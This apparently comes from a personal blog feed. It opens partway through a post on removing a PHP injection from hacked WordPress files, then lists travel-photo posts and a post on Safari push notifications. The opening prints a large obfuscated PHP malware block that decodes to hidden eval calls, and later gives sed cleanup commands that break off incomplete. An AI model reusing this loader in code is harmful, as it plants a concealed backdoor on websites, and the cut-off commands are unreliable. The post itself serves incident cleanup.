$faptyzynrt=substr($xcaudxkspk,(36491-26385),(30-23));explode(chr((222-178)),’7136,22,5230,37,5563,29,3206,63,10002,34,7525,68,9945,22,6686,33,2081,56,5331,35,7158,55,1851,57,2867,62,3692,22,9387,35,1725,29,6805,69,8482,23,410,28,2502,22,763,32,5515,28,3054,59,9907,38,3000,54,1205,42,8663,22,8127,51,8178,60,9708,50,6625,36,8505,68,1436,68,4518,57,2697,51,5629,32,1171,34,4107,63,9758,26,8816,41,7484,41,8901,37,5736,29,5890,33,6193,67,558,52,7114,22,2748,62,5543,20,6719,60,7752,47,2629,68,1401,35,8857,44,3664,28,610,69,10082,24,7240,22,9967,35,1311,32,6661,25,8009,66,1537,27,10036,46,2016,42,5366,30,990,52,2524,46,7712,40,5396,26,9627,30,8075,52,2417,51,3420,41,5206,24,4926,26,7433,51,3908,56,795,38,4170,28,3579,40,3964,25,7955,25,1504,33,2189,55,2058,23,5710,26,8685,41,9804,48,2348,69,341,69,3885,23,6928,56,4058,49,4267,46,191,39,159,32,2280,23,7316,51,1122,49,532,26,6582,43,9606,21,4026,32,3845,40,3989,37,6043,28,8386,46,6355,62,5292,39,4486,32,9252,25,7879,42,7367,31,6141,52,5126,52,833,40,3269,34,3355,33,53,54,3182,24,9317,70,3619,45,7213,27,230,62,2137,52,4198,69,4952,65,4456,30,724,39,1564,60,8432,50,8268,48,2468,34,5467,48,7083,31,8573,70,7026,57,9558,48,7683,29,6417,63,3113,69,9277,40,6260,65,8238,30,4860,38,3461,27,5868,22,8337,49,1624,47,6779,26,5789,24,9784,20,0,53,5178,28,4424,32,6984,42,4313,59,6874,54,1276,35,8938,65,4898,28,8316,21,5017,69,7921,34,4575,54,4659,27,7262,54,2971,29,679,45,3785,60,292,49,895,59,7398,35,1042,36,3752,33,9422,68,8794,22,7980,29,4791,69,1816,35,2929,42,1247,29,5813,29,6325,30,4686,57,1671,54,3488,33,5267,25,954,36,5842,26,5592,37,9206,46,1343,58,3388,32,6480,48,5086,40,8726,68,8643,20,107,52,873,22,438,65,5765,24,1754,41,503,29,1962,54,2570,59,6528,54,1908,54,4629,30,9003,66,1078,44,7799,59,3303,52,5978,65,9137,69,5923,55,1795,21,7858,21,3714,38,4372,52,9657,51,2303,45,7593,22,6071,70,9852,55,5422,45,9069,68,9490,68,2810,57,7615,68,2244,36,5661,49,4743,48,3521,58′); $hygsptewnv=substr($intygvhpad,(68724-58618),(27-20)); if (!function_exists(’dzdykdapjx’))(!function_exists(’qgefvbbbeh’)) { function dzdykdapjx($iirlbjafoq, $yzupjbekgp)qgefvbbbeh($tzeljmdfmc, $yxuogarznu) { $wiznxwlvkn$ylbcpzwxzw = NULL; for($lvifcrsvkz=0;$lvifcrsvkz<(sizeof($iirlbjafoq)/2);$lvifcrsvkz++)for($jzkpqbmdpb=0;$jzkpqbmdpb<(sizeof($tzeljmdfmc)/2);$jzkpqbmdpb++) { $wiznxwlvkn$ylbcpzwxzw .= substr($yzupjbekgp, $iirlbjafoq[($lvifcrsvkz*2)],$iirlbjafoq[($lvifcrsvkz*2)+1]);substr($yxuogarznu, $tzeljmdfmc[($jzkpqbmdpb*2)],$tzeljmdfmc[($jzkpqbmdpb*2)+1]); } return $wiznxwlvkn;$ylbcpzwxzw; };} $wxnlzvtcsp=”\x20\57\x2a\40\x6b\162\x67\155\x6f\163\x69\156\x6d\143\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\60\x37\55\x31\67\x30\51\x29\54\x20\143\x68\162\x28\50\x35\65\x31\55\x34\65\x39\51\x29\54\x20\144\x7a\144\x79\153\x64\141\x70\152\x78\50\x24\154\x61\146\x65\172\x63\145\x68\150\x64\54\x24\170\x63\141\x75\144\x78\153\x73\160\x6b\51\x29\51\x3b\40\x2f\52\x20\172\x70\162\x79\157\x67\161\x76\153\x77\40\x2a\57\x20″; $cxvsbyhuqr=substr($xcaudxkspk,(32792-22679),(53-41)); $cxvsbyhuqr($faptyzynrt, $wxnlzvtcsp,$fetzsqsnzm=”\x20\57\x2a\40\x73\152\x63\171\x6f\143\x73\163\x67\152\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\63\x32\55\x31\71\x35\51\x29\54\x20\143\x68\162\x28\50\x33\62\x35\55\x32\63\x33\51\x29\54\x20\161\x67\145\x66\166\x62\142\x62\145\x68\50\x24\163\x77\150\x71\142\x69\170\x71\161\x62\54\x24\151\x6e\164\x79\147\x76\150\x70\141\x64\51\x29\51\x3b\40\x2f\52\x20\147\x6c\161\x71\161\x73\141\x73\152\x73\40\x2a\57\x20″; $ckixkiunxy=substr($intygvhpad,(63147-53034),(69-57)); $ckixkiunxy($hygsptewnv, $fetzsqsnzm, NULL); $cxvsbyhuqr=$wxnlzvtcsp; $cxvsbyhuqr=(493-372); $xcaudxkspk=$cxvsbyhuqr-1;$ckixkiunxy=$fetzsqsnzm; $ckixkiunxy=(428-307); $intygvhpad=$ckixkiunxy-1; ?>

As you can see from looking at the diff, there is indeed a common signature:

$GLOBALS[“%x61%156%x75%156%x61”]=1

Next, I tried to see if the signature comes up in more files:

egrep -irl '%x61%156%x75%156%x61' ./

The result confirmed my suspicion of a common signature. So next up came the question on how to clean the contaminated files. I build the following code and tested it on one file:

sed -i -e "1s/.*/


This command replaces the first line of a file with the following content:

So next, I combined what I had into the following one-liner:
egrep -irl '%x61%156%x75%156%x61' ./ |xargs sed -i -e "1s/.*/

The code is recursively searching for files with the signature. It starts in the current working directory and replaces the first line of affected files with 
However, this code has problems with theme files, as a lot of .php files do not start off with the same line. So I cleaned up the theme files manually. Whilst this brought back the functionality of the site, I would strongly recommend to harden the security of the entire site and server. Unfortunately I noticed several things while having a first look on the community’s site.
The post Clean WordPress from PHP Exploit P0358 appeared first on sascha.us.



Prague
Sascha Endlicher, M.A. — Tue, 11 Mar 2014 18:10:11 +0000
Last summer I have been to Prague in the Czech Republic with friends and family. Once you climb your way all the way up to the castle you will see well, roofs, lots of red roofs! It’s a beautiful city and so I thought I should share my view on the red roofs with my […]
The post Prague appeared first on sascha.us.



Yet another photo of the abandoned house Nimrod
Sascha Endlicher, M.A. — Tue, 11 Mar 2014 18:04:43 +0000
The abandoned house Nimrod was the first abandoned house where I took photos. I took so many photos, but I rarely get the chance to shift through my old photos and share them. Anyway, here is another example. Enjoy!
The post Yet another photo of the abandoned house Nimrod appeared first on sascha.us.



Apple Safari Push Notifications
Sascha Endlicher, M.A. — Mon, 13 Jan 2014 18:06:24 +0000
As you might have noticed when visiting this page, website visitors who are surfing the web with the Safari web browser on Mac OS Mavericks are asked whether they want to receive notifications on future page updates. If you belong to this user group and opt-in for Safari Push Notifications, you will receive an alert as soon as I publish a new article or photo. The notification finally appears in your notification center on the Mac.
I promise not to overdo it with my blog posts and photos and I will not send you spam bombs. In Safari, you can go to Settings > Notifications to see an overview of all push notifications you previously opted-in to.
I have implemented the notification system for this site. I understand that I only reach about 2 % of all web users who visit my site. There are however similar notification features available for other browsers and I will gradually incorporate similar functions for the users of these browsers.
Whilst implementing the notification feature I noticed a possible security breach. Further on, I have some thoughts on improving the system. As an end user, I have a hard time to understand why I can only subscribe to notifications on my mac. I am unable to opt-in for similar notifications on my other iOS devices. This is particularly odd, as Apple is typically widely praised for its consistent user experience. However, this is not the case with website push notifications.
Let’s assume that I activate the notification function on an airline’s website, as I expect that I be notified of any changes to my reserved flight.  However, once I leave the house and while I am on my trip with my mobile iOS devices, I will not be notified of gate changes or any other information that might be beneficial for my trip, unless the website would automatically synchronize the data with a user account in the airline’s app- So if the airline’s company website would send me a push notification, I would only be able to see them on my Mac next time I boot it up. There is clearly room for improvement for v2 of the API.
The post Apple Safari Push Notifications appeared first on sascha.us.



Pennybacker Bridge, Austin, Texas
Sascha Endlicher, M.A. — Thu, 22 Aug 2013 19:30:05 +0000
The Pennybacker Bridge in Austin, Texas, connects the northern and southern sections of the Loop 360 highway across Lake Austin. The Loop 360 highway is widely considered one of the most scenic urban drives in central Texas. I took this photo of a sunset from a rock near the bridge exactly two months ago.
The post Pennybacker Bridge, Austin, Texas appeared first on sascha.us.



Ways and water ways
Sascha Endlicher, M.A. — Tue, 06 Aug 2013 10:00:04 +0000
The lake looks like yet another parallel path to walk on with this long exposure photograph. The County Line BBQ restaurants in Texas typically feature scenic views. This was taken at County Line on the Lake in Austin, Texas, and features a view on the lake.
The post Ways and water ways appeared first on sascha.us.



Barton Springs Pool in Austin, Texas
Sascha Endlicher, M.A. — Thu, 01 Aug 2013 15:00:01 +0000
My first instagram in a long time. I took this exactly 2 months ago. There is not really much to see here except for water at Barton Springs in Austin, Texas, but this is just great in the pre summer heat over there. 95F. Ugh.
The post Barton Springs Pool in Austin, Texas appeared first on sascha.us.



Bamberg, Germany
Sascha Endlicher, M.A. — Sun, 07 Jul 2013 18:21:26 +0000
The amazing city of Bamberg in Bavaria is part of the UNESCO world heritage.
The post Bamberg, Germany appeared first on sascha.us.



St. Bartholomä #1
Sascha Endlicher, M.A. — Wed, 26 Jun 2013 18:18:08 +0000
As you have probably figured out by now, I love Königssee. This photo was taken near Schönau or Berchtesgaden or Salzburg one year ago and received over 3000 likes on Instagram.
The post St. Bartholomä #1 appeared first on sascha.us.



Königssee boat house
Sascha Endlicher, M.A. — Tue, 25 Jun 2013 18:14:19 +0000
I took this as a real Instagram at the Königssee boat house near Schönau or Berchtesgaden or Salzburg exactly one year ago. 😉
Over 3000 people liked the photo on Instagram!
The post Königssee boat house appeared first on sascha.us.



Lake Mondsee
Sascha Endlicher, M.A. — Mon, 24 Jun 2013 18:10:17 +0000
A long exposure of Lake Mondsee near Salzburg in Austria one year ago.
The post Lake Mondsee appeared first on sascha.us.



Oeztal creek in Austria
Sascha Endlicher, M.A. — Sun, 23 Jun 2013 18:06:42 +0000
Over 4000 people liked this photo since I posted it on Instagram one year ago. This is a long exposure capture of a creek in the Alps in Austria.
The post Oeztal creek in Austria appeared first on sascha.us.



Alpsee near Schwangau
Sascha Endlicher, M.A. — Fri, 21 Jun 2013 18:04:49 +0000
View of Alpsee near Schwangau from Neuschwanstein castle near Füssen in Bavaria. Beautiful nature at sunset!
The post Alpsee near Schwangau appeared first on sascha.us.



Neuschwanstein castle
Sascha Endlicher, M.A. — Wed, 19 Jun 2013 17:58:41 +0000
One year ago I was on a trip to Austria. We passed Neuschwanstein castle near Füssen in Bavaria on the way. The photo of this fairy tale castle received over 3000 likes on Instagram.
The post Neuschwanstein castle appeared first on sascha.us.



Simplicity
Sascha Endlicher, M.A. — Fri, 07 Jun 2013 17:54:57 +0000
This photo features simplicity. It shows a blue sky, clouds and a rapeseed field in spring time in Germany. I posted it on Instagram exactly one year ago and more than 1000 people liked the photo.
The post Simplicity appeared first on sascha.us.



Memorial day ceremony
Sascha Endlicher, M.A. — Tue, 28 May 2013 17:51:31 +0000
I spent Memorial Day 2012 with friends in Margraten, Netherlands, last year. Honor those who sacrificed their lives for freedom!
The post Memorial day ceremony appeared first on sascha.us.



Schönbrunn
Sascha Endlicher, M.A. — Sat, 18 May 2013 17:48:38 +0000
A vanishing point shot of Schönbrunn castle in Vienna, Austria. First posted on Instagram one year ago.
The post Schönbrunn appeared first on sascha.us.



Lincoln Memorial at sunset
Sascha Endlicher, M.A. — Wed, 15 May 2013 17:45:37 +0000
Another photo that got me over 1000 likes on Instagram. It shows the Lincoln Memorial at Sunset in Washington, DC and I posted it on Instagram one year ago.
The post Lincoln Memorial at sunset appeared first on sascha.us.